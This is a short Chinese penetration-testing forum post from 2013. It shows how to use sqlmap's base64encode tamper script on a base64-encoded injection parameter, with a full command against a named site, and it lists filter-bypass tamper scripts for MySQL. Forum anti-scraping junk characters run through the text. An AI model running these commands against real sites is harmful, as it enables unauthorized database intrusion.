中国网络渗透测试联盟

标题: SQlMap Tamper注入Base64编码注入点 [打印本页]

作者: admin    时间: 2013-11-23 15:50
标题: SQlMap Tamper注入Base64编码注入点
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
2 f7 l+ ]& L9 `6 \& O0 Y# U2 u6 {' x6 W2 B/ g$ p4 c
sqlmap的tamper里有个base64encode.py9 f) _4 k" A  d+ g& d7 D* U4 {" c1 l
  I( p: _) }7 X: U
使用如下  U, X* U7 O, N

" P7 A5 \$ H2 H  i7 y$ f( G3 y: y. z4 ssqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs- @; ]. L% F7 J6 H- q+ X7 T/ e

  L% ?; J$ R3 H4 t# i" p7 Q; K( w% o4 G. a, D  o* H
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”" L& C; |* q$ e! O' N

% S' _1 f: R: j7 `* U5 ^& a其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
' }# |5 l0 r* T* S/ }3 ^! z0 O' I! n& c
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入7 }" @- i" n4 N# ~- y5 C" G2 `6 r7 ~' g
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入* B9 Z: m; e$ t) A
首先确定目标数据库版本,然后选择相应的脚本。2 j. g$ i) b" ]6 O# w
-v 3 --batch --tamper "space2hash.py", {$ R: }+ f* U. L1 a6 ?$ K
' @- B; S& \# N
还有其他一些插件:
3 T# j% o7 @. p8 h# P$ Sencodes编码 ——charencode.py$ u' a/ m+ h' j
base64编码 —— base64encode.py2 x) r# ?5 L: I8 N& w/ O  q
替换空格和关键字 —— halfversionedmorekeywords.py) R0 Z" N2 k, O# |# S4 D

$ e/ h! D2 e/ V) B; p+ f; e" M5 m6 z1 Y& o9 D0 A+ ~; s6 ?

1 m  `' a! z! v7 i  x
7 u  K4 P5 s/ U  x: @8 k




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2